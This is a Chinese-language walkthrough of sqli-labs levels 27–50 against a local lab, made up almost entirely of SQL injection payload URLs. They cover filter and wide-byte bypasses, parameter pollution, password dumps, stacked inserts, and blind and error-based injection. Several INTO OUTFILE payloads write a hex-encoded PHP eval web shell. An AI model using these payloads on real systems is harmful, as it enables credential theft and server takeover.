less-27
- 比上一关多加了union,select的过滤,只要大小写混杂就可以绕过
#判断正确
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
#判断错误
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='a')='1
less-27a
less-28
- 我感觉跟27关没什么大区别,仅仅是改了闭合符,而且好像还不单独过滤select了
http://localhost/sqli-labs-7.2/Less-28?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
less-28a
- 过滤条件比上一关还少,只过滤了union select这种组合,把空格改成括号就行了,或者直接用28关的也行
http://localhost/sqli-labs-7.2/Less-28a?id=-1') union(select 1,2,group_concat(username) from users) %23
less-29
- 利用tomcat解析第一个参数,apache解析最后一个参数来进行注入
#爆用户
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,user(),3--+
#爆数据库名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3--+
#爆数据段名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),3--+
#爆数据
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(username) from users),3--+
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(password) from users),3--+
less-30
http://127.0.0.1:8001/sqli-labs/Less-30/index.jsp?id=1&id=-2"union select 1,(select group_concat(password) from users),3--+
less-31
http://127.0.0.1:8001/sqli-labs/Less-31/index.jsp?id=1&id=-2")union select 1,(select group_concat(password) from users),3--+
less-32
- 前面的'利用宽字节绕过,后面的'用十六进制编码绕过
#爆用户名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(user()),3--+
#爆数据库
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479),3--+
#爆数据段名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),3--+
#爆数据
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(username) from users),3--+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(password) from users),3--+
less-33
less-34
- 将 utf-8 转换为 utf-16 或 utf-32,例如将 ’ 转为 utf-16 为%ff%fe%27直接用万能密码绕过登陆
>>> '\''.encode('utf-16')
"\xff\xfe'\x00"
less-35
- 跟33关差不多,但是没有闭合符号,所以不用考虑绕过addslashes函数
#爆数据库名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(schema_name) , 3 from information_schema.schemata %23
#爆数据库表名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(table_name) , 3 from information_schema.tables where table_schema = 0x7365637572697479 %23
#爆数据库段名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(column_name) , 3 from information_schema.columns where table_name = 0x7573657273 %23
#爆数据
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(username) , 3 from users %23
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(password) , 3 from users %23
less-36
- 由于mysql没有设置编码为gbk而数据段name编码为gbk,所以可以利用前面%df%27或者utf-16,utf-32编码来绕过mysql_real_eacape_string函数
#爆数据库名
http://127.0.0.1/sqli-labs/Less-36?id=-1%df' union select 1,group_concat(schema_name),3 from information_schema.schemata %23
less-37
uname=%ff%fe%27 or 1=1 %23 &passwd=dumb&submit=Submit
less-38
http://127.0.0.1/sqli-labs/Less-38?id=1';insert into users(id,username,password) values('17','aaa','bbb'); %23
less-39
http://127.0.0.1/sqli-labs/Less-39?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-40
http://127.0.0.1/sqli-labs/Less-40?id=1') ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-41
- 跟39关的差别就是不报错,只能通过and 1=1和and 1=2回显来判断是否注入成功
http://127.0.0.1/sqli-labs/Less-41?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-42
login_user=a &login_password=c';create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-43
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-44
less-45
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-46
- order by后面的注入,可以利用报错注入,延时注入
#由于版本问题,下面这种报错注入只能获取版本,不能获取更多的信息
http://127.0.0.1/sqli-labs/Less-46/?sort=1 and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) %23
#报错注入
http://127.0.0.1/sqli-labs/Less-46?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
#延时注入
http://127.0.0.1/sqli-labs/Less-46?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
http://127.0.0.1/sqli-labs/Less-46?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23
#导出文件
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#写文件
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23
less-47
#报错注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
#延时注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#导出文件
http://127.0.0.1/sqli-labs/Less-47/?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#写文件
http://127.0.0.1/sqli-labs/Less-47?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23
less-48
#延时注入
http://127.0.0.1/sqli-labs/Less-48?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#或者用into outfile写文件
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile "/Users/hacker-mao/Documents/MAMP/4.php" %23
#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f706f73745b22313233225d293f3e %23
less-49
#延时注入
http://127.0.0.1/sqli-labs/Less-49?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
less-50
- 看着跟46关差不多,主要区别就是这关使用了mysqli_multi_query()函数
#延时注入
http://127.0.0.1/sqli-labs/Less-50/?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
http://127.0.0.1/sqli-labs/Less-50?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23
#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
- order by stacked injection!执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是我们之前提到的statcked injection
http://127.0.0.1/sqli-labs/Less-50?sort=1 ; create table test like users;
